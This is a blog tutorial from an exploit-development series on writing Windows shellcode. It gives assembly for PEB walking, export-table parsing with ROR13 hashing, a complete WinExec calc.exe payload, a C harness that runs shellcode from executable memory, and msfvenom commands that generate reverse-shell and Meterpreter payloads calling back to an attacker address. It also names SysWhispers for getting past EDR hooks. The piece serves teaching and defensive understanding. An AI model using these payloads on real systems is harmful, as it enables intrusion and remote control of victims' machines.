Thilan Dissanayaka Exploit Development April 22, 2020

Writing Shellcode for Windows

In the Linux shellcode article, we wrote shellcode that called the kernel directly — load registers, trigger int 0x80, done. The kernel’s syscall interface is stable, documented, and numbered. Syscall 11 is always execve. Syscall 1 is always exit.

Windows doesn’t work that way.

Windows syscall numbers change between versions, sometimes even between service packs. On x64, for example, NtCreateFile is syscall 0x52 on Windows 7 SP1 and 0x55 on Windows 10. Microsoft treats the syscall interface as private and undocumented. You’re supposed to go through the documented Win32 API exported by DLLs such as kernel32.dll and user32.dll, which in turn call into ntdll.dll.

This means Windows shellcode must:

Find where kernel32.dll is loaded in memory — at runtime, without hardcoding addresses
Parse kernel32.dll’s export table — walk the PE structure to find function addresses
Resolve the API functions it needs — WinExec, LoadLibraryA, GetProcAddress, etc.
Call those functions — finally do something useful

This is significantly more complex than Linux shellcode. But it’s also more elegant — once you understand PEB walking and export parsing, you can call any Windows API function from position-independent shellcode.

The Architecture — Why PEB Walking?

When a Windows process starts, the OS loads several DLLs into its address space. The most important for shellcode:

DLL	Why We Need It
kernel32.dll	Contains `WinExec`, `LoadLibraryA`, `GetProcAddress`, `ExitProcess`
ntdll.dll	Low-level NT functions, always loaded first
ws2_32.dll	WinSock — needed for reverse shells (not loaded by default)

The problem: ASLR randomizes where these DLLs load. We can’t hardcode WinExec = 0x7C8623AD — that address changes every boot.

The solution: every Windows process has a Process Environment Block (PEB) — a data structure that contains, among other things, a linked list of all loaded modules (DLLs) and their base addresses. The PEB is always accessible via a fixed CPU segment register.

TEB (Thread Environment Block)
  ↓ offset 0x30
PEB (Process Environment Block)
  ↓ offset 0x0C
PEB_LDR_DATA
  ↓ offset 0x14
InMemoryOrderModuleList (doubly-linked list)
  → the executable itself
  → ntdll.dll
  → kernel32.dll (or kernelbase.dll)
  → ...other loaded DLLs

From any thread, at any time, regardless of ASLR:

mov eax, [fs:0x30]    ; EAX = PEB address (always works, 32-bit; NASM syntax)
; On 64-bit: mov rax, [gs:0x60]

That’s the entry point. From the PEB, we walk the module list to find kernel32.dll’s base address. From kernel32.dll’s base, we parse the PE export table to find function addresses.

Step 1: Finding kernel32.dll via PEB

The PEB Structure (Relevant Fields)

PEB (at fs:[0x30]):
  +0x00  InheritedAddressSpace
  +0x08  ImageBaseAddress
  +0x0C  Ldr  →  PEB_LDR_DATA
         ...

PEB_LDR_DATA:
  +0x0C  InLoadOrderModuleList
  +0x14  InMemoryOrderModuleList  ← We use this one
  +0x1C  InInitializationOrderModuleList

Each list entry (LDR_DATA_TABLE_ENTRY via InMemoryOrderModuleList, 32-bit offsets relative to InMemoryOrderLinks):
  +0x00  InMemoryOrderLinks.Flink  (next entry)
  +0x04  InMemoryOrderLinks.Blink  (previous entry)
  +0x08  InInitializationOrderLinks
  +0x10  DllBase                   ← The DLL's base address in memory
  +0x14  EntryPoint
  +0x18  SizeOfImage
  +0x1C  FullDllName (UNICODE_STRING)
  +0x24  BaseDllName (UNICODE_STRING)
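
One way to sanity-check these offsets is to model the 32-bit structure with ctypes and subtract the offset of InMemoryOrderLinks, since the list pointers point at that member rather than at the start of the entry. This is a minimal sketch: the class names and the helper `offset_from_memory_links` are illustrative, and only the leading fields of LDR_DATA_TABLE_ENTRY are modeled.

```python
import ctypes

class ListEntry32(ctypes.Structure):
    # 32-bit LIST_ENTRY: two 4-byte pointers
    _fields_ = [("Flink", ctypes.c_uint32), ("Blink", ctypes.c_uint32)]

class UnicodeString32(ctypes.Structure):
    # 32-bit UNICODE_STRING: two 16-bit lengths and a 4-byte buffer pointer
    _fields_ = [("Length", ctypes.c_uint16),
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_uint32)]

class LdrDataTableEntry32(ctypes.Structure):
    # Leading fields only; the real structure continues past BaseDllName
    _fields_ = [("InLoadOrderLinks", ListEntry32),
                ("InMemoryOrderLinks", ListEntry32),
                ("InInitializationOrderLinks", ListEntry32),
                ("DllBase", ctypes.c_uint32),
                ("EntryPoint", ctypes.c_uint32),
                ("SizeOfImage", ctypes.c_uint32),
                ("FullDllName", UnicodeString32),
                ("BaseDllName", UnicodeString32)]

def offset_from_memory_links(field_name):
    """Offset of a field as seen from a pointer to InMemoryOrderLinks."""
    base = LdrDataTableEntry32.InMemoryOrderLinks.offset
    return getattr(LdrDataTableEntry32, field_name).offset - base

for name in ("DllBase", "EntryPoint", "SizeOfImage", "FullDllName", "BaseDllName"):
    print(f"+0x{offset_from_memory_links(name):02X}  {name}")
```

The DllBase result is the 0x10 that the shellcode adds to the list pointer.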

The InMemoryOrderModuleList is a doubly-linked list of all loaded modules. The order is:

The executable itself (e.g., vulnerable.exe)
ntdll.dll
kernel32.dll (or kernelbase.dll on Win7+)

So to find kernel32.dll, we follow the list: skip the first entry (the exe), skip the second (ntdll), and the third is kernel32.

Assembly: Walking the PEB

; Find kernel32.dll base address
; 32-bit Windows

    xor ecx, ecx
    mov eax, [fs:ecx+0x30]     ; EAX = PEB (NASM segment-override syntax)
    mov eax, [eax+0x0C]        ; EAX = PEB->Ldr (PEB_LDR_DATA)
    mov esi, [eax+0x14]        ; ESI = InMemoryOrderModuleList.Flink (first entry)
    lodsd                       ; EAX = second entry (ntdll.dll)
    xchg eax, esi              ; ESI = second entry
    lodsd                       ; EAX = third entry (kernel32.dll)
    mov ebx, [eax+0x10]        ; EBX = kernel32.dll base address!

Let’s trace this:

fs:[0x30] gives us the PEB
PEB+0x0C gives us PEB_LDR_DATA
PEB_LDR_DATA+0x14 gives us the first entry in InMemoryOrderModuleList (the .exe)
First lodsd (loads dword at ESI into EAX, advances ESI) moves to the second entry (ntdll.dll)
Second lodsd moves to the third entry (kernel32.dll)
Entry+0x10 gives us the DllBase — kernel32.dll’s base address

EBX now contains kernel32.dll’s base address. This works regardless of ASLR.
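
To make the pointer chasing concrete, the walk can be replayed in Python against a fake memory image. Everything here is made up for illustration: the addresses, the module bases, and the helper names (`write32`, `read32`, `find_third_module_base`). Only the offsets 0x0C, 0x14 and 0x10 come from the text above.

```python
import struct

MEM_BASE = 0x10000                 # hypothetical address of our fake memory
mem = bytearray(0x400)

def write32(addr, value):
    struct.pack_into("<I", mem, addr - MEM_BASE, value)

def read32(addr):
    return struct.unpack_from("<I", mem, addr - MEM_BASE)[0]

# Hypothetical structure addresses and module bases
PEB, LDR = 0x10000, 0x10100
MODULES = [("exe", 0x10200, 0x00400000),
           ("ntdll", 0x10240, 0x77000000),
           ("kernel32", 0x10280, 0x76000000)]

write32(PEB + 0x0C, LDR)                       # PEB->Ldr
list_head = LDR + 0x14                         # InMemoryOrderModuleList
write32(list_head, MODULES[0][1])              # head.Flink -> first entry
for i, (_, links, dll_base) in enumerate(MODULES):
    nxt = MODULES[i + 1][1] if i + 1 < len(MODULES) else list_head
    write32(links, nxt)                        # InMemoryOrderLinks.Flink
    write32(links + 0x10, dll_base)            # DllBase

def find_third_module_base(peb):
    ldr = read32(peb + 0x0C)       # mov eax, [eax+0x0C]
    entry = read32(ldr + 0x14)     # mov esi, [eax+0x14]  (first entry)
    entry = read32(entry)          # lodsd                (second entry)
    entry = read32(entry)          # lodsd                (third entry)
    return read32(entry + 0x10)    # mov ebx, [eax+0x10]

print(hex(find_third_module_base(PEB)))
```

Each `read32` corresponds to one memory load in the assembly, which is why the real routine fits in a handful of instructions.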

Note on Modern Windows

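On Windows 7+, kernelbase.dll is also loaded early, and the module order is an implementation detail rather than a guarantee. The ordering problem is best known from InInitializationOrderModuleList, where kernelbase.dll comes before kernel32.dll; in InMemoryOrderModuleList, kernel32.dll is normally still the third entry. kernelbase.dll exports many of the same functions. For maximum compatibility, some shellcode walks the list and checks each module name, but for simplicity, the third-entry assumption works for most cases.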

Step 2: Parsing the PE Export Table

Now that we have kernel32.dll’s base address, we need to find specific functions within it. DLLs are PE (Portable Executable) files, and their exported functions are listed in the Export Directory.

PE Structure (from the base address)

Base Address (EBX):
  +0x3C  e_lfanew → offset to PE signature

PE Signature:
  +0x00  "PE\0\0"
  +0x78  Export Directory RVA (Relative Virtual Address)

Export Directory:
  +0x18  NumberOfNames
  +0x1C  AddressOfFunctions   (RVA array of function addresses)
  +0x20  AddressOfNames       (RVA array of function name pointers)
  +0x24  AddressOfNameOrdinals (RVA array of ordinal values)

The export resolution process:

Walk the AddressOfNames array — compare each name to the function we’re looking for
When we find a match at index i — read the ordinal from AddressOfNameOrdinals[i]
Use the ordinal to index into AddressOfFunctions — that gives us the function’s RVA
Add the DLL base address to the RVA — that’s the actual function address
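
The four steps can be sketched in Python against a tiny synthetic module image. This is an illustration under assumptions, not a real PE parser: `build_fake_module` fabricates only the fields the lookup touches, the RVAs are arbitrary, and the image is treated as already mapped so that an RVA is simply an index into the buffer.

```python
import struct

def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]

def u16(img, off):
    return struct.unpack_from("<H", img, off)[0]

def cstring(img, off):
    return bytes(img[off:img.index(b"\x00", off)]).decode("ascii")

def resolve_export(img, base, wanted):
    pe = u32(img, 0x3C)                      # e_lfanew
    exp = u32(img, pe + 0x78)                # Export Directory RVA (PE32)
    n_names = u32(img, exp + 0x18)
    funcs = u32(img, exp + 0x1C)             # AddressOfFunctions
    names = u32(img, exp + 0x20)             # AddressOfNames
    ords = u32(img, exp + 0x24)              # AddressOfNameOrdinals
    for i in range(n_names):
        if cstring(img, u32(img, names + 4 * i)) == wanted:
            ordinal = u16(img, ords + 2 * i)             # 16-bit entries
            return base + u32(img, funcs + 4 * ordinal)  # RVA + base
    return None

def build_fake_module():
    img = bytearray(0x400)
    struct.pack_into("<I", img, 0x3C, 0x80)              # e_lfanew
    img[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<I", img, 0x80 + 0x78, 0x200)      # export directory RVA
    struct.pack_into("<I", img, 0x200 + 0x18, 2)         # NumberOfNames
    struct.pack_into("<I", img, 0x200 + 0x1C, 0x240)
    struct.pack_into("<I", img, 0x200 + 0x20, 0x260)
    struct.pack_into("<I", img, 0x200 + 0x24, 0x280)
    struct.pack_into("<3I", img, 0x240, 0x1000, 0x2000, 0x3000)  # function RVAs
    struct.pack_into("<2I", img, 0x260, 0x300, 0x310)            # name RVAs
    struct.pack_into("<2H", img, 0x280, 2, 0)   # ordinals, deliberately not 0, 1
    img[0x300:0x30C] = b"ExitProcess\x00"
    img[0x310:0x318] = b"WinExec\x00"
    return img

img = build_fake_module()
print(hex(resolve_export(img, 0x76000000, "WinExec")))
```

The ordinal table is deliberately out of step with the name table here, to show why the name index cannot be used directly on AddressOfFunctions.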

Assembly: Finding a Function by Name

This is the core routine of every Windows shellcode. We’ll write a function that takes a DLL base address and a function name hash, and returns the function address.

Why Hashing?

Comparing strings byte-by-byte in shellcode is bulky. Instead, we compute a hash of each export name and compare it to a pre-computed hash of the function we want. This saves space significantly.

The most common hash algorithm in shellcode is a simple rotate-and-add:

; Hash function: ROR13 + ADD
; Input: ESI = pointer to ASCII string
; Output: EDX = hash

compute_hash:
    xor edx, edx
    xor eax, eax               ; Clear EAX so only the byte in AL is added below
.hash_loop:
    lodsb                       ; AL = next byte, ESI++
    test al, al
    jz .hash_done
    ror edx, 13                 ; Rotate right by 13
    add edx, eax               ; Add character value
    jmp .hash_loop
.hash_done:
    ret

Pre-compute the hash for WinExec:

def ror13_hash(name):
    h = 0
    for c in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ord(c)) & 0xFFFFFFFF
    return h

print(hex(ror13_hash("WinExec")))          # 0x0E8AFE98
print(hex(ror13_hash("ExitProcess")))       # 0x73E2D87E
print(hex(ror13_hash("LoadLibraryA")))      # 0xEC0E4E8E
print(hex(ror13_hash("GetProcAddress")))    # 0x7C0DFCAA
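
Because the hash ends up as an immediate operand inside the shellcode, it is worth checking each constant for null bytes, and checking that no two wanted names share a hash. The helpers below (`has_null_byte`, `find_collisions`) are hypothetical names for a minimal sketch of both checks; `ror13_hash` is repeated so the block runs on its own.

```python
def ror13_hash(name):
    h = 0
    for c in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # rotate right by 13
        h = (h + ord(c)) & 0xFFFFFFFF
    return h

def has_null_byte(value):
    """True if the 32-bit constant would put a 0x00 byte into the code."""
    return 0 in value.to_bytes(4, "little")

def find_collisions(names):
    """Return pairs of distinct names that hash to the same value."""
    seen, collisions = {}, []
    for n in names:
        h = ror13_hash(n)
        if h in seen and seen[h] != n:
            collisions.append((seen[h], n))
        seen.setdefault(h, n)
    return collisions

wanted = ["WinExec", "ExitProcess", "LoadLibraryA", "GetProcAddress"]
for n in wanted:
    h = ror13_hash(n)
    print(f"{n:15s} 0x{h:08X}  null byte: {has_null_byte(h)}")
print("collisions:", find_collisions(wanted))
```

For a stricter check, `find_collisions` could be run over every export name of the target DLL.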

Assembly: Complete Export Resolution

; find_function: Resolve a function from a DLL by hash
; Input:  EBX = DLL base address
;         EDX = hash of function name to find
; Output: EAX = function address

find_function:
    pushad                      ; Save all registers; the target hash (EDX) lands at [esp+0x14]
    mov eax, [ebx+0x3C]        ; e_lfanew (offset to PE header)
    mov edi, [ebx+eax+0x78]    ; Export Directory RVA
    add edi, ebx               ; EDI = Export Directory absolute address
    mov ecx, [edi+0x18]        ; ECX = NumberOfNames

.find_loop:
    jecxz .find_fail            ; If no more names, fail
    dec ecx
    mov esi, [edi+0x20]        ; AddressOfNames RVA (reloaded each pass; lodsb clobbers EAX)
    add esi, ebx               ; ESI = AddressOfNames absolute
    mov esi, [esi+ecx*4]       ; ESI = RVA of name[ecx]
    add esi, ebx               ; ESI = absolute address of name string

    ; Compute hash of this export name
    xor edx, edx
    xor eax, eax               ; Clear EAX so "add edx, eax" adds only the character in AL
.hash_loop:
    lodsb
    test al, al
    jz .hash_done
    ror edx, 13
    add edx, eax
    jmp .hash_loop

.hash_done:
    cmp edx, [esp+0x14]        ; Compare with our target hash (saved EDX in the pushad frame)
    jnz .find_loop              ; No match, try next name

    ; Match found! Get the function address
    mov eax, [edi+0x24]        ; AddressOfNameOrdinals RVA
    add eax, ebx
    mov cx, [eax+ecx*2]        ; CX = ordinal for this name
    mov eax, [edi+0x1C]        ; AddressOfFunctions RVA
    add eax, ebx
    mov eax, [eax+ecx*4]       ; EAX = function RVA
    add eax, ebx               ; EAX = function absolute address!

    mov [esp+0x1C], eax        ; Store result (overwrite saved EAX in pushad frame)
    popad
    ret

.find_fail:
    popad
    xor eax, eax
    ret
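
The stack offsets in this routine depend on the order in which PUSHAD saves the registers. As a small sketch, using the documented push order and a hypothetical helper name `pushad_frame`, the layout right after `pushad` inside a called routine can be tabulated like this:

```python
# Order in which PUSHAD pushes the registers; the first one pushed ends up
# at the highest address, the last one at [esp+0].
PUSHAD_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]

def pushad_frame():
    """Map each saved register to its offset from ESP right after PUSHAD."""
    frame = {reg: 4 * i for i, reg in enumerate(reversed(PUSHAD_ORDER))}
    # CALL pushed the return address before PUSHAD ran, so it sits just above.
    frame["return address"] = 4 * len(PUSHAD_ORDER)
    return frame

for name, off in sorted(pushad_frame().items(), key=lambda kv: kv[1]):
    print(f"[esp+0x{off:02X}]  {name}")
```

A value passed in EDX is therefore found at [esp+0x14], and writing to [esp+0x1C] changes what POPAD later restores into EAX. [esp+0x24] would instead be the first dword the caller pushed before the call, which only matters if the hash is passed on the stack.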

Step 3: Putting It All Together — WinExec Shellcode

Now we combine PEB walking + export resolution + the actual payload.

Complete WinExec(“calc.exe”) Shellcode

[BITS 32]

    cld                         ; Clear direction flag

; ===== FIND KERNEL32.DLL =====
    xor ecx, ecx
    mov eax, [fs:ecx+0x30]     ; PEB
    mov eax, [eax+0x0C]        ; PEB->Ldr
    mov esi, [eax+0x14]        ; InMemoryOrderModuleList
    lodsd                       ; Skip exe entry → ntdll
    xchg eax, esi
    lodsd                       ; Skip ntdll → kernel32
    mov ebx, [eax+0x10]        ; EBX = kernel32.dll base

; ===== FIND WinExec =====
    mov edx, 0x0E8AFE98        ; Hash of "WinExec"
    call find_function          ; EAX = WinExec address
    mov edi, eax               ; Save WinExec address in EDI

; ===== FIND ExitProcess =====
    mov edx, 0x73E2D87E        ; Hash of "ExitProcess"
    call find_function          ; EAX = ExitProcess address
    mov esi, eax               ; Save ExitProcess address in ESI

; ===== CALL WinExec("calc.exe", 0) =====
    xor ecx, ecx
    push ecx                   ; null terminator
    push 0x6578652E            ; ".exe"
    push 0x636C6163            ; "calc"
    mov eax, esp               ; EAX = pointer to "calc.exe\0" on stack

    push ecx                   ; uCmdShow = 0 (SW_HIDE)
    push eax                   ; lpCmdLine = "calc.exe"
    call edi                   ; Call WinExec("calc.exe", 0)

; ===== CALL ExitProcess(0) =====
    xor ecx, ecx
    push ecx                   ; Exit code = 0
    call esi                   ; Call ExitProcess(0)


; ===== FIND_FUNCTION SUBROUTINE =====
find_function:
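    pushad                      ; Target hash (EDX) is saved at [esp+0x14]
    mov eax, [ebx+0x3C]
    mov edi, [ebx+eax+0x78]
    add edi, ebx
    mov ecx, [edi+0x18]

.find_loop:
    jecxz .find_fail
    dec ecx
    mov esi, [edi+0x20]        ; Reload AddressOfNames each pass (lodsb clobbers EAX)
    add esi, ebx
    mov esi, [esi+ecx*4]
    add esi, ebx

    xor edx, edx
    xor eax, eax               ; Only AL should contribute to the hash
.hash_loop:
    lodsb
    test al, al
    jz .hash_compare
    ror edx, 13
    add edx, eax
    jmp .hash_loop

.hash_compare:
    cmp edx, [esp+0x14]        ; Saved EDX in the pushad frame
    jnz .find_loop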

    mov eax, [edi+0x24]
    add eax, ebx
    mov cx, [eax+ecx*2]
    mov eax, [edi+0x1C]
    add eax, ebx
    mov eax, [eax+ecx*4]
    add eax, ebx
    mov [esp+0x1C], eax
    popad
    ret

.find_fail:
    popad
    xor eax, eax
    ret

Compiling and Testing

# Assemble
$ nasm -f bin shellcode.asm -o shellcode.bin

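# Count null bytes (should be 0 for null-free delivery).
# Note: as laid out above, each forward "call find_function" assembles to
# E8 plus a small positive rel32 whose upper bytes are 00. Placing
# find_function ahead of its callers (and jumping over it) makes the
# displacement negative and removes those nulls.
$ xxd -p -c 1 shellcode.bin | grep -c '^00$'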

# Extract as hex string
$ xxd -p shellcode.bin | tr -d '\n'

# Check size
$ wc -c shellcode.bin
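
The same checks can be scripted, which also gives the byte offsets of any nulls instead of just a count. This is a minimal sketch with hypothetical helper names (`null_offsets`, `to_c_string`); the sample bytes are the opening instructions of the shellcode as they appear in the C harness.

```python
def null_offsets(data):
    """Offsets of every 0x00 byte in the shellcode."""
    return [i for i, b in enumerate(data) if b == 0]

def to_c_string(data, per_line=13):
    """Format bytes as C string literals, a fixed number of bytes per line."""
    lines = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        lines.append('"' + "".join(f"\\x{b:02x}" for b in chunk) + '"')
    return "\n".join(lines)

# First 19 bytes of the shellcode (cld, PEB walk); for a real run, read the
# assembled file instead: data = open("shellcode.bin", "rb").read()
sample = bytes.fromhex("fc31c9648b41308b400c8b7014ad96ad8b5810")

print("length:", len(sample))
print("null bytes at:", null_offsets(sample))
print(to_c_string(sample))
```

Knowing the offset of a null byte makes it easy to map it back to the instruction that produced it in a disassembly.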

The C Test Harness

#include <stdio.h>
#include <string.h>   // memcpy
#include <windows.h>

unsigned char shellcode[] =
"\xfc\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14"
"\xad\x96\xad\x8b\x58\x10..."  // (full shellcode bytes here)
;

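int main(void) {
    // sizeof includes the string's trailing '\0', so subtract 1
    printf("Shellcode length: %u\n", (unsigned)(sizeof(shellcode) - 1));

    // Allocate executable memory
    void *exec = VirtualAlloc(NULL, sizeof(shellcode),
                              MEM_COMMIT | MEM_RESERVE,
                              PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }

    memcpy(exec, shellcode, sizeof(shellcode));

    // Execute
    ((void(*)(void))exec)();

    return 0;
}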

Compile with:

> gcc -o test test.c -m32
> test.exe

Calculator should pop up.

Avoiding Null Bytes

Just like Linux shellcode, null bytes (\x00) terminate C strings and break many exploit delivery mechanisms. Common null byte sources and fixes:

Problem	Contains Null	Fix
`mov eax, 0`	`\xB8\x00\x00\x00\x00`	`xor eax, eax`
`push 0`	`\x6A\x00`	`xor ecx, ecx; push ecx`
`mov eax, 0x0E8AFE98`	May contain `\x00`	Check — this one doesn’t
String “calc.exe\0”	Null terminator	Push null via `xor ecx,ecx; push ecx` before pushing the string
`push 0x00636C61`	Leading zero byte	Pad the string so every pushed dword is full, or push an encoded value and decode it at runtime

The string pushing technique:

; Push "calc.exe\0" onto the stack (no null bytes in the code)
xor ecx, ecx
push ecx                   ; Push null terminator (\0)

; "calc.exe" = 63 61 6C 63 2E 65 78 65
; In little-endian dwords:
push 0x6578652E            ; ".exe" (backwards: 2E 65 78 65)
push 0x636C6163            ; "calc" (backwards: 63 61 6C 63)

mov eax, esp               ; EAX points to "calc.exe\0"

Each push puts 4 bytes on the stack in little-endian order. The null terminator is pushed first (via push ecx where ECX=0).
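
Working out the dwords by hand gets error-prone for longer strings, so a small generator helps. The sketch below uses hypothetical helper names (`push_dwords`, `emit_push_sequence`) and only handles strings whose length is a multiple of 4; other lengths need padding or a different encoding.

```python
import struct

def push_dwords(text):
    """Return the dword immediates to push, in push order (last chunk first)."""
    data = text.encode("ascii")
    if len(data) % 4:
        raise ValueError("this sketch only handles lengths that are a multiple of 4")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # Each 4-byte chunk is read as a little-endian dword; the stack grows
    # downward, so the end of the string is pushed first.
    return [struct.unpack("<I", c)[0] for c in reversed(chunks)]

def emit_push_sequence(text):
    lines = ["xor ecx, ecx", "push ecx"]             # null terminator
    lines += [f"push 0x{d:08X}" for d in push_dwords(text)]
    lines.append("mov eax, esp")                     # EAX -> start of string
    return lines

print("\n".join(emit_push_sequence("calc.exe")))
```

For "calc.exe" this reproduces the two immediates used above, 0x6578652E followed by 0x636C6163.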

Reverse Shell Shellcode

A calculator pop is a proof of concept. For real exploitation, we need a reverse shell. This requires loading ws2_32.dll (WinSock), which isn’t loaded by default.

The Strategy

Find kernel32.dll → resolve LoadLibraryA and GetProcAddress
Call LoadLibraryA("ws2_32.dll") → load WinSock
Use GetProcAddress to find: WSAStartup, WSASocketA, connect
Initialize WinSock, create a socket, connect to the attacker
Redirect stdin/stdout/stderr to the socket
Spawn cmd.exe

Shellcode flow:
PEB → kernel32.dll base
  → LoadLibraryA("ws2_32.dll") → ws2_32.dll base
  → WSAStartup(0x0202, &wsadata)
  → WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0)
  → connect(sock, {AF_INET, port, IP}, 16)
  → CreateProcessA("cmd.exe", ..., stdin=sock, stdout=sock, stderr=sock)
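
The `{AF_INET, port, IP}` argument to connect is a 16-byte sockaddr_in structure, and its byte order is a common source of bugs: the family is stored in host order, while the port and address are in network (big-endian) order. Here is a minimal sketch of the layout, using hypothetical helper names (`pack_sockaddr_in`, `make_word`) and the example address from the msfvenom commands:

```python
import socket
import struct

AF_INET = 2   # value of AF_INET on Windows and Linux

def make_word(low, high):
    """Equivalent of the MAKEWORD macro, e.g. for the WSAStartup version."""
    return (high << 8) | low

def pack_sockaddr_in(ip, port):
    return (struct.pack("<H", AF_INET)      # sin_family, host byte order
            + struct.pack(">H", port)       # sin_port, network byte order
            + socket.inet_aton(ip)          # sin_addr, network byte order
            + b"\x00" * 8)                  # sin_zero padding

addr = pack_sockaddr_in("192.168.1.100", 4444)
print(len(addr), addr.hex())

# The first two dwords as they would be pushed by shellcode
family_port, ip_dword = struct.unpack_from("<II", addr)
print(hex(family_port), hex(ip_dword))
print(hex(make_word(2, 2)))                 # 0x202, WinSock 2.2
```

The family/port dword contains null bytes when written as an immediate, so hand-written shellcode usually builds it indirectly instead of pushing it as-is.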

This is substantially more complex than Linux reverse shell shellcode (which is ~70 bytes using raw syscalls). Windows reverse shell shellcode is typically 300-500 bytes due to the PEB walking, export resolution, and WinSock setup overhead.

In practice, most exploit developers use msfvenom to generate Windows shellcode:

# Windows reverse shell shellcode
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
    -f c -a x86 --platform windows -b "\x00"

# Windows Meterpreter (staged)
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
    -f c -a x86 --platform windows -b "\x00"

# Exec calc.exe (proof of concept)
$ msfvenom -p windows/exec CMD=calc.exe \
    -f c -a x86 --platform windows -b "\x00"

But understanding how it works under the hood — PEB walking, export parsing, API resolution — is essential for writing custom payloads, debugging failed exploits, and analyzing malware.

Linux vs Windows Shellcode — Complete Comparison

Aspect	Linux	Windows
Syscall interface	Stable, numbered (`int 0x80` / `syscall`)	Unstable, undocumented (changes per version)
How to call OS	Load registers, trigger interrupt	Must find and call DLL functions dynamically
Finding functions	Not needed — syscall numbers are fixed	Walk PEB → parse PE exports → resolve by hash
Position independence	`jmp-call-pop` for data references	PEB walking is inherently position-independent
Typical size (shell)	21-50 bytes	150-500 bytes
Null byte avoidance	Same techniques	Same techniques
Reverse shell size	70-100 bytes	300-500 bytes
Complexity	Simple (register + interrupt)	Complex (PEB + PE parsing + API calls)
Key skill	Understanding syscall ABI	Understanding PE format and Windows internals
Encoding	`shikata_ga_nai`, XOR	Same encoders work

The size difference is dramatic. A Linux execve("/bin/sh") shellcode is 21 bytes. The equivalent Windows shellcode (finding kernel32, resolving WinExec, calling it) is ~150+ bytes minimum. This is entirely due to the extra work of dynamic API resolution.

Debugging Shellcode with x32dbg

When shellcode doesn’t work (and it often doesn’t on the first try), x32dbg is your best friend.

Method 1: Test Harness

Compile the C test harness (above), load it in x32dbg, and step through:

Set breakpoint at the VirtualAlloc return
After VirtualAlloc, note the allocated memory address
Set breakpoint at the call to the shellcode (the function pointer call)
Step into — you're now inside your shellcode
Step through instruction by instruction
Watch registers and the stack at each step

Method 2: Inject into a Process

Load target process in x32dbg
Allocate memory: right-click memory map → Allocate Memory
Write shellcode bytes to the allocated region
Set EIP to the shellcode address
Step through

Key Things to Watch

EBX after PEB walk — Does it contain a valid kernel32.dll base? (Should look like 0x7xxx0000)
The export table parse — Is EDI pointing to a valid Export Directory? Check with Memory Map to verify it’s within kernel32.dll’s range.
The hash comparison — Set a conditional breakpoint on the cmp instruction to catch when your target hash matches.
The function address — After find_function returns, is EAX a valid code address within kernel32.dll?
The stack before API calls — Are arguments in the right order? Is the stack aligned?

Resource	Purpose
msfvenom	Generate Windows shellcode for any payload
Donut	Convert .NET assemblies and PE files into position-independent shellcode
SysWhispers	Generate direct syscall stubs (bypass API hooking by EDR)
Shellcode compiler (scc)	Compile C code into position-independent shellcode
PE-bear	GUI PE parser — helps understand DLL structures
Windows Internals (book)	Deep dive into PEB, TEB, and loader internals

Final Thoughts

Windows shellcode is harder than Linux shellcode. There’s no way around it. The PEB walking, PE export parsing, and dynamic API resolution add complexity that simply doesn’t exist on Linux. A Linux shellcode writer thinks about registers and syscall numbers. A Windows shellcode writer thinks about PE structures, linked lists, and hash-based function resolution.

But this complexity is also what makes it interesting. The PEB walk is an elegant solution to a real problem — finding code at runtime without any hardcoded addresses. It’s the same technique that malware uses to resolve API functions dynamically (making static analysis harder). Understanding it gives you insight into both offensive and defensive security on Windows.

If you’ve followed the Linux and Windows exploit development series to this point — from basic GDB reversing through stack overflows, ret2libc, and now shellcode internals — you have a solid foundation in low-level exploitation on both platforms.

Happy reversing!